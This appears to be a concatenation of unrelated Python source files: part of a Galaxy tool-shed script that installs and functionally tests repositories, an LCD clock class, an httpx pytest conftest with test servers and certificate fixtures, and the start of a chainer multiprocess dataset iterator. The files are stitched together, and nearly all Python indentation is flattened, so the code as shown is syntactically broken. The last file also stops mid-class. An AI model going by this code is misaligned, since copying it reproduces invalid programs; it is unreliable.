migrated_tool_conf_xml = tool_conf_template_parser.safe_substitute( shed_tool_path=galaxy_migrated_tool_path )
file( galaxy_migrated_tool_conf_file, 'w' ).write( migrated_tool_conf_xml )
# ---- Build Galaxy Application --------------------------------------------------
global_conf = { '__file__' : 'universe_wsgi.ini.sample' }
if not database_connection.startswith( 'sqlite://' ):
kwargs[ 'database_engine_option_max_overflow' ] = '20'
kwargs[ 'database_engine_option_pool_size' ] = '10'
app = UniverseApplication( admin_users = 'test@bx.psu.edu',
allow_user_creation = True,
allow_user_deletion = True,
allow_library_path_paste = True,
database_connection = database_connection,
datatype_converters_config_file = "datatype_converters_conf.xml.sample",
file_path = galaxy_file_path,
global_conf = global_conf,
id_secret = galaxy_encode_secret,
job_queue_workers = 5,
log_destination = "stdout",
migrated_tools_config = galaxy_migrated_tool_conf_file,
new_file_path = galaxy_tempfiles,
running_functional_tests=True,
shed_tool_data_table_config = shed_tool_data_table_conf_file,
shed_tool_path = galaxy_shed_tool_path,
template_path = "templates",
tool_config_file = [ galaxy_tool_conf_file, galaxy_shed_tool_conf_file ],
tool_data_path = tool_data_path,
tool_data_table_config_path = galaxy_tool_data_table_conf_file,
tool_dependency_dir = tool_dependency_dir,
tool_path = tool_path,
tool_parse_help = False,
tool_sheds_config_file = galaxy_tool_sheds_conf_file,
update_integrated_tool_panel = False,
use_heartbeat = False,
**kwargs )
log.info( "Embedded Galaxy application started" )
# ---- Run galaxy webserver ------------------------------------------------------
server = None
webapp = buildapp.app_factory( dict( database_file=database_connection ),
use_translogger=False,
static_enabled=False,
app=app )
# Serve the app on a specified or random port.
if galaxy_test_port is not None:
server = httpserver.serve( webapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
else:
random.seed()
for i in range( 0, 9 ):
try:
galaxy_test_port = str( random.randint( default_galaxy_test_port_min, default_galaxy_test_port_max ) )
log.debug( "Attempting to serve app on randomly chosen port: %s", galaxy_test_port )
server = httpserver.serve( webapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
break
except socket.error, e:
if e[0] == 98:
continue
raise
else:
raise Exception( "Unable to open a port between %s and %s to start Galaxy server" % \
( default_galaxy_test_port_min, default_galaxy_test_port_max ) )
if galaxy_test_proxy_port:
os.environ[ 'GALAXY_INSTALL_TEST_PORT' ] = galaxy_test_proxy_port
else:
os.environ[ 'GALAXY_INSTALL_TEST_PORT' ] = galaxy_test_port
# Start the server.
t = threading.Thread( target=server.serve_forever )
t.start()
# Test if the server is up.
for i in range( 10 ):
# Directly test the app, not the proxy.
conn = httplib.HTTPConnection( galaxy_test_host, galaxy_test_port )
conn.request( "GET", "/" )
if conn.getresponse().status == 200:
break
time.sleep( 0.1 )
else:
raise Exception( "Test HTTP server did not return '200 OK' after 10 tries" )
log.info( "Embedded galaxy web server started" )
if galaxy_test_proxy_port:
log.info( "The embedded Galaxy application is running on %s:%s", galaxy_test_host, galaxy_test_proxy_port )
else:
log.info( "The embedded Galaxy application is running on %s:%s", galaxy_test_host, galaxy_test_port )
log.info( "Repositories will be installed from the tool shed at %s", galaxy_tool_shed_url )
success = False
# If a tool_data_table_conf.test.xml file was found, add the entries from it into the app's tool data tables.
if additional_tool_data_tables:
app.tool_data_tables.add_new_entries_from_config_file( config_filename=additional_tool_data_tables,
tool_data_path=additional_tool_data_path,
shed_tool_data_table_config=None,
persist=False )
# Initialize some variables for the summary that will be printed to stdout.
repositories_passed = []
repositories_failed = []
repositories_failed_install = []
exclude_list = []
if os.path.exists( exclude_list_file ):
log.info( 'Loading the list of repositories excluded from testing from the file %s...', exclude_list_file )
exclude_list = parse_exclude_list( exclude_list_file )
try:
# Get a list of repositories to test from the tool shed specified in the GALAXY_INSTALL_TEST_TOOL_SHED_URL environment variable.
log.info( "Retrieving repositories to install from the URL:\n%s\n", str( galaxy_tool_shed_url ) )
if '-check_all_revisions' not in sys.argv:
repositories_to_install = get_repositories_to_install( galaxy_tool_shed_url, latest_revision_only=True )
else:
repositories_to_install = get_repositories_to_install( galaxy_tool_shed_url, latest_revision_only=False )
log.info( "Retrieved %d repositories from the API.", len( repositories_to_install ) )
if '-list_repositories' in sys.argv:
log.info( "The API returned the following repositories, not counting deleted:" )
for repository_info_dict in repositories_to_install:
log.info( "%s owned by %s changeset revision %s",
repository_info_dict.get( 'name', None ),
repository_info_dict.get( 'owner', None ),
repository_info_dict.get( 'changeset_revision', None ) )
repositories_tested = len( repositories_to_install )
# This loop will iterate through the list of repositories generated by the above code, having already filtered out any
# that were marked as deleted. For each repository, it will generate a test method that will use Twill to install that
# repository into the embedded Galaxy application that was started up, selecting to install repository and tool
# dependencies if they are defined. If the installation completes successfully, it will then generate a test case for
# each functional test defined for each tool in the repository, and execute the generated test cases. When this completes,
# it will record the result of the tests, and if any failed, the traceback and captured output of the tool that was run.
# After all tests have completed, the repository is uninstalled, so that the previous test cases don't interfere with
# the next repository's functional tests.
for repository_info_dict in repositories_to_install:
"""
Each repository_info_dict looks something like:
{
"changeset_revision": "13fa22a258b5",
"contents_url": "/api/repositories/529fd61ab1c6cc36/contents",
"deleted": false,
"deprecated": false,
"description": "Convert column case.",
"downloadable": true,
"id": "529fd61ab1c6cc36",
"long_description": "This tool takes the specified columns and converts them to uppercase or lowercase.",
"malicious": false,
"name": "change_case",
"owner": "test",
"private": false,
"repository_id": "529fd61ab1c6cc36",
"times_downloaded": 0,
"tool_shed_url": "http://toolshed.local:10001",
"url": "/api/repository_revisions/529fd61ab1c6cc36",
"user_id": "529fd61ab1c6cc36"
}
"""
repository_status = dict()
params = dict()
repository_id = str( repository_info_dict.get( 'repository_id', None ) )
changeset_revision = str( repository_info_dict.get( 'changeset_revision', None ) )
metadata_revision_id = repository_info_dict.get( 'id', None )
# Add the URL for the tool shed we're installing from, so the automated installation methods go to the right place.
repository_info_dict[ 'tool_shed_url' ] = galaxy_tool_shed_url
# Get the name and owner out of the repository info dict.
name = str( repository_info_dict[ 'name' ] )
owner = str( repository_info_dict[ 'owner' ] )
# Populate the repository_status dict now.
repository_status = get_tool_test_results_from_api( galaxy_tool_shed_url, metadata_revision_id )
if 'test_environment' not in repository_status:
repository_status[ 'test_environment' ] = {}
test_environment = get_test_environment( repository_status[ 'test_environment' ] )
test_environment[ 'galaxy_database_version' ] = get_database_version( app )
test_environment[ 'galaxy_revision'] = get_repository_current_revision( os.getcwd() )
repository_status[ 'test_environment' ] = test_environment
repository_status[ 'passed_tests' ] = []
repository_status[ 'failed_tests' ] = []
repository_status[ 'skip_reason' ] = None
# Iterate through the list of repositories defined not to be installed. This should be a list of dicts in the following format:
# {
# 'reason': The default reason or the reason specified in this section,
# 'repositories':
# [
# ( name, owner, changeset revision if changeset revision else None ),
# ( name, owner, changeset revision if changeset revision else None )
# ]
# },
# If changeset revision is None, that means the entire repository is excluded from testing, otherwise only the specified
# revision should be skipped.
# TODO: When a repository is selected to be skipped, use the API to update the tool shed with the defined skip reason.
skip_this_repository = False
skip_because = None
for exclude_by_reason in exclude_list:
reason = exclude_by_reason[ 'reason' ]
exclude_repositories = exclude_by_reason[ 'repositories' ]
if ( name, owner, changeset_revision ) in exclude_repositories or ( name, owner, None ) in exclude_repositories:
skip_this_repository = True
skip_because = reason
break
if skip_this_repository:
repository_status[ 'not_tested' ] = dict( reason=skip_because )
params[ 'tools_functionally_correct' ] = False
params[ 'do_not_test' ] = False
register_test_result( galaxy_tool_shed_url, metadata_revision_id, repository_status, repository_info_dict, params )
log.info( "Not testing revision %s of repository %s owned by %s.", changeset_revision, name, owner )
continue
else:
log.info( "Installing and testing revision %s of repository %s owned by %s...", changeset_revision, name, owner )
# Explicitly clear tests from twill's test environment.
remove_generated_tests( app )
# Use the repository information dict to generate an install method that will install the repository into the embedded
# Galaxy application, with tool dependencies and repository dependencies, if any.
test_install_repositories.generate_install_method( repository_info_dict )
os.environ[ 'GALAXY_INSTALL_TEST_HOST' ] = galaxy_test_host
# Configure nose to run the install method as a test.
test_config = nose.config.Config( env=os.environ, plugins=nose.plugins.manager.DefaultPluginManager() )
test_config.configure( sys.argv )
# Run the configured install method as a test. This method uses the embedded Galaxy application's web interface to install the specified
# repository, with tool and repository dependencies also selected for installation.
result, _ = run_tests( test_config )
success = result.wasSuccessful()
repository_status[ 'installation_errors' ] = dict( current_repository=[], repository_dependencies=[], tool_dependencies=[] )
try:
repository = test_db_util.get_installed_repository_by_name_owner_changeset_revision( name, owner, changeset_revision )
except:
log.exception( 'Error getting installed repository.' )
success = False
pass
# If the installation succeeds, configure and run functional tests for this repository. This is equivalent to
# sh run_functional_tests.sh -installed
if success:
log.debug( 'Installation of %s succeeded, running all defined functional tests.', name )
# Generate the shed_tools_dict that specifies the location of test data contained within this repository. If the repository
# does not have a test-data directory, this will return has_test_data = False, and we will set the do_not_test flag to True,
# and the tools_functionally_correct flag to False, as well as updating tool_test_results.
file( galaxy_shed_tools_dict, 'w' ).write( to_json_string( dict() ) )
has_test_data, shed_tools_dict = parse_tool_panel_config( galaxy_shed_tool_conf_file, from_json_string( file( galaxy_shed_tools_dict, 'r' ).read() ) )
# The repository_status dict should always have the following structure:
# {
# "test_environment":
# {
# "galaxy_revision": "9001:abcd1234",
# "galaxy_database_version": "114",
# "tool_shed_revision": "9001:abcd1234",
# "tool_shed_mercurial_version": "2.3.1",
# "tool_shed_database_version": "17",
# "python_version": "2.7.2",
# "architecture": "x86_64",
# "system": "Darwin 12.2.0"
# },
# "passed_tests":
# [
# {
# "test_id": "The test ID, generated by twill",
# "tool_id": "The tool ID that was tested",
# "tool_version": "The tool version that was tested",
# },
# ]
# "failed_tests":
# [
# {
# "test_id": "The test ID, generated by twill",
# "tool_id": "The tool ID that was tested",
# "tool_version": "The tool version that was tested",
# "stderr": "The output of the test, or a more detailed description of what was tested and what the outcome was."
# "traceback": "The captured traceback."
# },
# ]
# "installation_errors":
# {
# 'tool_dependencies':
# [
# {
# 'type': 'Type of tool dependency, e.g. package, set_environment, etc.',
# 'name': 'Name of the tool dependency.',
# 'version': 'Version if this is a package, otherwise blank.',
# 'error_message': 'The error message returned when installation was attempted.',
# },
# ],
# 'repository_dependencies':
# [
# {
# 'tool_shed': 'The tool shed that this repository was installed from.',
# 'name': 'The name of the repository that failed to install.',
# 'owner': 'Owner of the failed repository.',
# 'changeset_revision': 'Changeset revision of the failed repository.',
# 'error_message': 'The error message that was returned when the repository failed to install.',
# },
# ],
# 'current_repository':
# [
# {
# 'tool_shed': 'The tool shed that this repository was installed from.',
# 'name': 'The name of the repository that failed to install.',
# 'owner': 'Owner of the failed repository.',
# 'changeset_revision': 'Changeset revision of the failed repository.',
# 'error_message': 'The error message that was returned when the repository failed to install.',
# },
# ],
# {
# "name": "The name of the repository.",
# "owner": "The owner of the repository.",
# "changeset_revision": "The changeset revision of the repository.",
# "error_message": "The message stored in tool_dependency.error_message."
# },
# }
# "missing_test_components":
# [
# {
# "tool_id": "The tool ID that missing components.",
# "tool_version": "The version of the tool."
# "tool_guid": "The guid of the tool."
# "missing_components": "Which components are missing, e.g. the test data filename, or the test-data directory."
# },
# ]
# "not_tested":
# {
# "reason": "The Galaxy development team has determined that this repository should not be installed and tested by the automated framework."
# }
# }
failed_tool_dependencies = repository.includes_tool_dependencies and repository.tool_dependencies_with_installation_errors
failed_repository_dependencies = repository.repository_dependencies_with_installation_errors
if 'missing_test_components' not in repository_status:
repository_status[ 'missing_test_components' ] = []
if not has_test_data:
# If the repository does not have a test-data directory, any functional tests in the tool configuration will
# fail. Mark the repository as failed and skip installation.
log.error( 'Test data is missing for this repository. Updating repository and skipping functional tests.' )
# Record the lack of test data if the repository metadata defines tools.
if 'tools' in repository.metadata:
for tool in repository.metadata[ 'tools' ]:
tool_id = tool[ 'id' ]
tool_version = tool[ 'version' ]
tool_guid = tool[ 'guid' ]
# In keeping with the standard display layout, add the error message to the dict for each tool individually.
missing_components = dict( tool_id=tool_id, tool_version=tool_version, tool_guid=tool_guid,
missing_components="Repository %s is missing a test-data directory." % name )
if missing_components not in repository_status[ 'missing_test_components' ]:
repository_status[ 'missing_test_components' ].append( missing_components )
else:
continue
# Record the status of this repository in the tool shed.
set_do_not_test = not is_latest_downloadable_revision( galaxy_tool_shed_url, repository_info_dict )
params[ 'tools_functionally_correct' ] = False
params[ 'missing_test_components' ] = True
params[ 'do_not_test' ] = str( set_do_not_test )
register_test_result( galaxy_tool_shed_url,
metadata_revision_id,
repository_status,
repository_info_dict,
params )
# Run the cleanup method. This removes tool functional test methods from the test_toolbox module and uninstalls the
# repository using Twill.
execute_uninstall_method( app )
# Set the test_toolbox.toolbox module-level variable to the new app.toolbox.
test_toolbox.toolbox = app.toolbox
repositories_failed.append( dict( name=name, owner=owner, changeset_revision=changeset_revision ) )
elif failed_tool_dependencies or failed_repository_dependencies:
# If a tool dependency fails to install correctly, this should be considered an installation error,
# and functional tests should be skipped, since the tool dependency needs to be correctly installed
# for the test to be considered reliable.
log.error( 'One or more tool dependencies of this repository are marked as missing.' )
log.error( 'Updating repository and skipping functional tests.' )
# In keeping with the standard display layout, add the error message to the dict for each tool individually.
for dependency in repository.tool_dependencies_with_installation_errors:
test_result = dict( type=dependency.type,
name=dependency.name,
version=dependency.version,
error_message=dependency.error_message )
repository_status[ 'installation_errors' ][ 'tool_dependencies' ].append( test_result )
for dependency in repository.repository_dependencies_with_installation_errors:
test_result = dict( tool_shed=dependency.tool_shed,
name=dependency.name,
owner=dependency.owner,
changeset_revision=dependency.changeset_revision,
error_message=dependency.error_message )
repository_status[ 'installation_errors' ][ 'repository_dependencies' ].append( test_result )
# Record the status of this repository in the tool shed.
params[ 'tools_functionally_correct' ] = False
params[ 'do_not_test' ] = False
params[ 'test_install_error' ] = True
register_test_result( galaxy_tool_shed_url,
metadata_revision_id,
repository_status,
repository_info_dict,
params )
# Run the cleanup method. This removes tool functional test methods from the test_toolbox module and uninstalls the
# repository using Twill.
execute_uninstall_method( app )
# Set the test_toolbox.toolbox module-level variable to the new app.toolbox.
test_toolbox.toolbox = app.toolbox
repositories_failed_install.append( dict( name=name, owner=owner, changeset_revision=changeset_revision ) )
else:
# If the repository does have a test-data directory, we write the generated shed_tools_dict to a file, so the functional
# test framework can find it.
file( galaxy_shed_tools_dict, 'w' ).write( to_json_string( shed_tools_dict ) )
log.info( 'Saved generated shed_tools_dict to %s\nContents: %s', galaxy_shed_tools_dict, str( shed_tools_dict ) )
# Set the GALAXY_TOOL_SHED_TEST_FILE environment variable to the path of the shed_tools_dict file, so that test.base.twilltestcase.setUp
# will find and parse it properly.
os.environ[ 'GALAXY_TOOL_SHED_TEST_FILE' ] = galaxy_shed_tools_dict
os.environ[ 'GALAXY_TEST_HOST' ] = galaxy_test_host
os.environ[ 'GALAXY_TEST_PORT' ] = galaxy_test_port
# Set the module-level variable 'toolbox', so that test.functional.test_toolbox will generate the appropriate test methods.
test_toolbox.toolbox = app.toolbox
# Generate the test methods for this installed repository. We need to pass in True here, or it will look
# in $GALAXY_HOME/test-data for test data, which may result in missing or invalid test files.
test_toolbox.build_tests( testing_shed_tools=True )
# Set up nose to run the generated functional tests.
test_config = nose.config.Config( env=os.environ, plugins=nose.plugins.manager.DefaultPluginManager() )
test_config.configure( sys.argv )
# Run the configured tests.
result, test_plugins = run_tests( test_config )
success = result.wasSuccessful()
# Use the ReportResults nose plugin to get a list of tests that passed.
for plugin in test_plugins:
if hasattr( plugin, 'getTestStatus' ):
test_identifier = '%s/%s' % ( owner, name )
passed_tests = plugin.getTestStatus( test_identifier )
break
repository_status[ 'passed_tests' ] = []
for test_id in passed_tests:
# Normalize the tool ID and version display.
tool_id, tool_version = get_tool_info_from_test_id( test_id )
test_result = dict( test_id=test_id, tool_id=tool_id, tool_version=tool_version )
repository_status[ 'passed_tests' ].append( test_result )
if success:
# This repository's tools passed all functional tests. Update the repository_metadata table in the tool shed's database
# to reflect that. Call the register_test_result method, which executes a PUT request to the repository_revisions API
                            # controller with the status of the test. This also sets the do_not_test and tools_functionally_correct flags, and
# updates the time_last_tested field to today's date.
repositories_passed.append( dict( name=name, owner=owner, changeset_revision=changeset_revision ) )
params[ 'tools_functionally_correct' ] = True
params[ 'do_not_test' ] = False
register_test_result( galaxy_tool_shed_url,
metadata_revision_id,
repository_status,
repository_info_dict,
params )
log.debug( 'Revision %s of repository %s installed and passed functional tests.', changeset_revision, name )
else:
# If the functional tests fail, log the output and update the failed changeset revision's metadata record in the tool shed via the API.
for failure in result.failures + result.errors:
# Record the twill test identifier and information about the tool, so the repository owner can discover which test is failing.
test_id = str( failure[0] )
tool_id, tool_version = get_tool_info_from_test_id( test_id )
test_status = dict( test_id=test_id, tool_id=tool_id, tool_version=tool_version )
log_output = failure[1].replace( '\\n', '\n' )
# Remove debug output that the reviewer or owner doesn't need.
log_output = re.sub( r'control \d+:.+', r'', log_output )
log_output = re.sub( r'\n+', r'\n', log_output )
appending_to = 'output'
tmp_output = {}
output = {}
# Iterate through the functional test output and extract only the important data. Captured logging and stdout are not recorded.
for line in log_output.split( '\n' ):
if line.startswith( 'Traceback' ):
appending_to = 'traceback'
elif '>> end captured' in line or '>> end tool' in line:
continue
elif 'request returned None from get_history' in line:
continue
elif '>> begin captured logging <<' in line:
appending_to = 'logging'
continue
elif '>> begin captured stdout <<' in line:
appending_to = 'stdout'
continue
elif '>> begin captured stderr <<' in line or '>> begin tool stderr <<' in line:
appending_to = 'stderr'
continue
if appending_to not in tmp_output:
tmp_output[ appending_to ] = []
tmp_output[ appending_to ].append( line )
for output_type in [ 'stderr', 'traceback' ]:
if output_type in tmp_output:
test_status[ output_type ] = '\n'.join( tmp_output[ output_type ] )
repository_status[ 'failed_tests' ].append( test_status )
# Call the register_test_result method, which executes a PUT request to the repository_revisions API controller with the outcome
# of the tests, and updates tool_test_results with the relevant log data.
                            # This also sets the do_not_test and tools_functionally_correct flags to the appropriate values, and updates the time_last_tested
# field to today's date.
repositories_failed.append( dict( name=name, owner=owner, changeset_revision=changeset_revision ) )
set_do_not_test = not is_latest_downloadable_revision( galaxy_tool_shed_url, repository_info_dict )
params[ 'tools_functionally_correct' ] = False
params[ 'do_not_test' ] = str( set_do_not_test )
register_test_result( galaxy_tool_shed_url,
metadata_revision_id,
repository_status,
repository_info_dict,
params )
log.debug( 'Revision %s of repository %s installed successfully, but did not pass functional tests.',
changeset_revision, name )
# Run the uninstall method. This removes tool functional test methods from the test_toolbox module and uninstalls the
# repository using Twill.
log.debug( 'Uninstalling changeset revision %s of repository %s',
repository_info_dict[ 'changeset_revision' ],
repository_info_dict[ 'name' ] )
success = execute_uninstall_method( app )
if not success:
log.error( 'Repository %s failed to uninstall.', repository_info_dict[ 'name' ] )
# Set the test_toolbox.toolbox module-level variable to the new app.toolbox.
test_toolbox.toolbox = app.toolbox
else:
# Even if the repository failed to install, execute the uninstall method, in case a dependency did succeed.
log.debug( 'Uninstalling repository %s', repository_info_dict[ 'name' ] )
try:
repository = test_db_util.get_installed_repository_by_name_owner_changeset_revision( name, owner, changeset_revision )
except:
log.exception( 'Unable to uninstall, no installed repository found.' )
continue
test_result = dict( tool_shed=repository.tool_shed,
name=repository.name,
owner=repository.owner,
changeset_revision=repository.changeset_revision,
error_message=repository.error_message )
repository_status[ 'installation_errors' ][ 'repository_dependencies' ].append( test_result )
params[ 'tools_functionally_correct' ] = False
params[ 'test_install_error' ] = True
params[ 'do_not_test' ] = False
register_test_result( galaxy_tool_shed_url,
metadata_revision_id,
repository_status,
repository_info_dict,
params )
success = execute_uninstall_method( app )
if not success:
log.error( 'Repository %s failed to uninstall.', repository_info_dict[ 'name' ] )
repositories_failed_install.append( dict( name=name, owner=owner, changeset_revision=changeset_revision ) )
log.debug( 'Repository %s failed to install correctly.', repository_info_dict[ 'name' ] )
except:
log.exception( "Failure running tests" )
log.info( "Shutting down" )
# ---- Tear down -----------------------------------------------------------
# Gracefully shut down the embedded web server and UniverseApplication.
if server:
log.info( "Shutting down embedded galaxy web server" )
server.server_close()
server = None
log.info( "Embedded galaxy server stopped" )
if app:
log.info( "Shutting down galaxy application" )
app.shutdown()
app = None
log.info( "Embedded galaxy application stopped" )
# Clean up test files unless otherwise specified.
if 'GALAXY_INSTALL_TEST_NO_CLEANUP' not in os.environ:
try:
for dir in [ galaxy_test_tmp_dir ]:
if os.path.exists( dir ):
log.info( "Cleaning up temporary files in %s", dir )
shutil.rmtree( dir )
except:
pass
else:
log.debug( 'GALAXY_INSTALL_TEST_NO_CLEANUP set, not cleaning up.' )
now = strftime( "%Y-%m-%d %H:%M:%S" )
print "####################################################################################"
print "# %s - repository installation and testing script completed." % now
print "# Repository revisions tested: %d" % repositories_tested
if '-info_only' in sys.argv:
print "# -info_only set, not updating the tool shed."
if repositories_tested > 0:
if repositories_passed:
print '# ----------------------------------------------------------------------------------'
print "# %d repositories passed all tests:" % len( repositories_passed )
show_summary_output( repositories_passed )
if repositories_failed:
print '# ----------------------------------------------------------------------------------'
print "# %d repositories failed one or more tests:" % len( repositories_failed )
show_summary_output( repositories_failed )
if repositories_failed_install:
# Set success to False so that the return code will not be 0.
success = False
print '# ----------------------------------------------------------------------------------'
print "# %d repositories with installation errors:" % len( repositories_failed_install )
show_summary_output( repositories_failed_install )
else:
success = True
else:
success = True
print "####################################################################################"
# Normally, the value of 'success' would determine whether this test suite is marked as passed or failed
# in the automated buildbot framework. However, due to the procedure used here, we only want to report
    # failure if a repository fails to install correctly. Therefore, we have overridden the value of 'success'
# here based on what actions the script has executed.
if success:
return 0
else:
return 1
if __name__ == "__main__":
now = strftime( "%Y-%m-%d %H:%M:%S" )
print "####################################################################################"
print "# %s - running repository installation and testing script." % now
print "####################################################################################"
sys.exit( main() )
|
clock.py
|
import asyncio
import time
from threading import Thread
from jukebox.lcd import LCD, LCDRow
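# Minimal usage sketch (illustrative; assumes an LCD instance is constructed elsewhere):
#   clock = Clock(lcd, sleep_after=120)
#   clock.start()   # updates the bottom LCD row roughly every 0.3 seconds in a daemon thread
#   clock.stop()    # or it stops itself and turns the LCD off after `sleep_after` seconds of running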
class Clock(object):
def __init__(self, lcd: LCD, sleep_after: int = 120):
self.__lcd = lcd
self.__running = False
self.__sleep_after = sleep_after
def start(self):
        if not self.__running:
self.__running = True
self.__thread = Thread(target=self.__run)
self.__thread.daemon = True
self.__thread.start()
def stop(self):
self.__running = False
self.__thread = None
def __run(self):
async def update_time():
current_time = time.strftime('%H:%M:%S', time.localtime())
self.__lcd.overwrite_centre(0, LCDRow.BOTTOM, current_time)
sleep_counter = 0
interval = 0.3
while self.__running:
current_time = time.strftime('%H:%M:%S', time.localtime())
self.__lcd.overwrite_centre(0, LCDRow.BOTTOM, current_time)
await asyncio.sleep(interval)
sleep_counter += interval
if sleep_counter >= self.__sleep_after:
self.__lcd.turn_off()
self.stop()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(update_time())
loop.close()
|
conftest.py
|
import asyncio
import json
import os
import threading
import time
import typing
import pytest
import trustme
from cryptography.hazmat.primitives.serialization import (
BestAvailableEncryption,
Encoding,
PrivateFormat,
)
from uvicorn.config import Config
from uvicorn.main import Server
from httpx import URL, AsyncioBackend
ENVIRONMENT_VARIABLES = {
"SSL_CERT_FILE",
"SSL_CERT_DIR",
"HTTP_PROXY",
"HTTPS_PROXY",
"ALL_PROXY",
"NO_PROXY",
"SSLKEYLOGFILE",
}
@pytest.fixture(scope="function", autouse=True)
def clean_environ() -> typing.Dict[str, typing.Any]:
"""Keeps os.environ clean for every test without having to mock os.environ"""
original_environ = os.environ.copy()
os.environ.clear()
os.environ.update(
{
k: v
for k, v in original_environ.items()
if k not in ENVIRONMENT_VARIABLES and k.lower() not in ENVIRONMENT_VARIABLES
}
)
yield
os.environ.clear()
os.environ.update(original_environ)
@pytest.fixture(params=[pytest.param(AsyncioBackend, marks=pytest.mark.asyncio)])
def backend(request):
backend_cls = request.param
return backend_cls()
async def app(scope, receive, send):
assert scope["type"] == "http"
if scope["path"] == "/slow_response":
await slow_response(scope, receive, send)
elif scope["path"].startswith("/status"):
await status_code(scope, receive, send)
elif scope["path"].startswith("/echo_body"):
await echo_body(scope, receive, send)
elif scope["path"].startswith("/echo_headers"):
await echo_headers(scope, receive, send)
else:
await hello_world(scope, receive, send)
async def hello_world(scope, receive, send):
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def slow_response(scope, receive, send):
await asyncio.sleep(0.1)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def status_code(scope, receive, send):
status_code = int(scope["path"].replace("/status/", ""))
await send(
{
"type": "http.response.start",
"status": status_code,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def echo_body(scope, receive, send):
body = b""
more_body = True
while more_body:
message = await receive()
body += message.get("body", b"")
more_body = message.get("more_body", False)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": body})
async def echo_headers(scope, receive, send):
body = {}
for name, value in scope.get("headers", []):
body[name.capitalize().decode()] = value.decode()
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"application/json"]],
}
)
await send({"type": "http.response.body", "body": json.dumps(body).encode()})
class CAWithPKEncryption(trustme.CA):
"""Implementation of trustme.CA() that can emit
private keys that are encrypted with a password.
"""
@property
def encrypted_private_key_pem(self):
return trustme.Blob(
self._private_key.private_bytes(
Encoding.PEM,
PrivateFormat.TraditionalOpenSSL,
BestAvailableEncryption(password=b"password"),
)
)
SERVER_SCOPE = "session"
@pytest.fixture(scope=SERVER_SCOPE)
def example_cert():
ca = CAWithPKEncryption()
ca.issue_cert("example.org")
return ca
@pytest.fixture(scope=SERVER_SCOPE)
def cert_pem_file(example_cert):
with example_cert.cert_pem.tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def cert_private_key_file(example_cert):
with example_cert.private_key_pem.tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def cert_encrypted_private_key_file(example_cert):
with example_cert.encrypted_private_key_pem.tempfile() as tmp:
yield tmp
class TestServer(Server):
@property
def url(self) -> URL:
protocol = "https" if self.config.is_ssl else "http"
return URL(f"{protocol}://{self.config.host}:{self.config.port}/")
def install_signal_handlers(self) -> None:
# Disable the default installation of handlers for signals such as SIGTERM,
# because it can only be done in the main thread.
pass
async def serve(self, sockets=None):
self.restart_requested = asyncio.Event()
loop = asyncio.get_event_loop()
tasks = {
loop.create_task(super().serve(sockets=sockets)),
loop.create_task(self.watch_restarts()),
}
await asyncio.wait(tasks)
async def restart(self) -> None:
# Ensure we are in an asyncio environment.
assert asyncio.get_event_loop() is not None
# This may be called from a different thread than the one the server is
# running on. For this reason, we use an event to coordinate with the server
# instead of calling shutdown()/startup() directly.
self.restart_requested.set()
self.started = False
while not self.started:
await asyncio.sleep(0.5)
async def watch_restarts(self):
while True:
if self.should_exit:
return
try:
await asyncio.wait_for(self.restart_requested.wait(), timeout=0.1)
except asyncio.TimeoutError:
continue
self.restart_requested.clear()
await self.shutdown()
await self.startup()
@pytest.fixture
def restart(backend):
"""Restart the running server from an async test function.
This fixture deals with possible differences between the environment of the
test function and that of the server.
"""
async def restart(server):
await backend.run_in_threadpool(AsyncioBackend().run, server.restart)
return restart
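# Hypothetical usage sketch (not an actual test in this suite): how the
# ``server`` and ``restart`` fixtures are meant to combine inside an async
# test body.
async def _example_restart_usage(server, restart):  # pragma: no cover
    await restart(server)
    assert server.started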
def serve_in_thread(server: Server):
thread = threading.Thread(target=server.run)
thread.start()
try:
while not server.started:
time.sleep(1e-3)
yield server
finally:
server.should_exit = True
thread.join()
@pytest.fixture(scope=SERVER_SCOPE)
def server():
config = Config(app=app, lifespan="off", loop="asyncio")
server = TestServer(config=config)
yield from serve_in_thread(server)
@pytest.fixture(scope=SERVER_SCOPE)
def https_server(cert_pem_file, cert_private_key_file):
config = Config(
app=app,
lifespan="off",
ssl_certfile=cert_pem_file,
ssl_keyfile=cert_private_key_file,
port=8001,
loop="asyncio",
)
server = TestServer(config=config)
yield from serve_in_thread(server)
|
multiprocess_iterator.py
|
from __future__ import division
from collections import namedtuple
import multiprocessing
from multiprocessing import sharedctypes
import signal
import sys
import threading
import warnings
import numpy
import six
from chainer.dataset import iterator
_response_time = 1.
_short_time = 0.001
_PrefetchState = namedtuple('_PrefetchState', (
'current_position', 'epoch', 'is_new_epoch',
'previous_epoch_detail', 'order'))
class MultiprocessIterator(iterator.Iterator):
"""Dataset iterator that loads examples in parallel.
This is an implementation of :class:`~chainer.dataset.Iterator` that loads
examples with worker processes. It uses the standard :mod:`multiprocessing`
module to parallelize the loading. The dataset is sent to the worker
processes in the standard way using pickle.
Note that this iterator effectively prefetches the examples for the next
batch asynchronously after the current batch is returned.
This iterator saves ``-1`` instead of ``None`` in snapshots since some
serializers do not support ``None``.
Args:
dataset (~chainer.dataset.Dataset): Dataset to iterate.
batch_size (int): Number of examples within each batch.
repeat (bool): If ``True``, it infinitely loops over the dataset.
Otherwise, it stops iteration at the end of the first epoch.
shuffle (bool): If ``True``, the order of examples is shuffled at the
beginning of each epoch. Otherwise, examples are extracted in the
order of indexes.
n_processes (int): Number of worker processes. The number of CPUs is
used by default.
n_prefetch (int): Number of prefetch batches.
        shared_mem (int): The size of the shared memory block reserved per
            example, in bytes. If ``None``, the size is measured and adjusted
            automatically.
"""
_interruption_testing = False # for testing
def __init__(self, dataset, batch_size, repeat=True, shuffle=True,
n_processes=None, n_prefetch=1, shared_mem=None):
self.dataset = dataset
self.batch_size = batch_size
